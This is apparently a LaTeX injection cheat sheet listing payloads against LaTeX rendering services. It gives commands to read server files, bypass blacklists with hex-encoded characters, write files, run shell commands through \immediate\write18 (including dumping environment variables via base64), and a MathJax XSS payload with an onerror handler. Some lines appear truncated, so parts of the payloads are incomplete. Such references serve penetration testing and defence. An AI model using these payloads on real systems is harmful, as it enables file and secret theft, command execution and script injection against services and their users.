LaTeX Injection is a type of injection attack where malicious content is injected into LaTeX documents. LaTeX is widely used for document preparation and typesetting, particularly in academia, for producing high-quality scientific and mathematical documents. Due to its powerful scripting capabilities, LaTeX can be exploited by attackers to execute arbitrary commands if proper safeguards are not in place.
Attackers can read the content of sensitive files on the server.
Read file and interpret the LaTeX code in it:
\include{somefile} # load .tex file (somefile.tex)
Read single lined file:
\read\file to\line
Read multiple lined file:
\read\file to\fileline
Read text file, without interpreting the content, it will only paste raw file content:
If injection point is past document header (\usepackage
cannot be used), some control
characters can be deactivated in order to use \input
on file containing $
, #
, &
, null bytes, ... (eg. perl scripts).
\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
To bypass a blacklist try to replace one character with it's unicode hex value.
- ^^41 represents a capital A
- ^^7e represents a tilde (~) note that the ‘e’ must be lower case
Write single lined file:
\write\outfile{Line 2}
\write\outfile{I like trains}
The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
\immediate\write18{id > output}
If you get any LaTex error, consider using base64 to get the result without bad characters (or use \verbatiminput
\immediate\write18{env | base64 > test.tex}
From @EdOverflow
In mathjax
\unicode{<img src=1 onerror="<ARBITRARY_JS_CODE>">}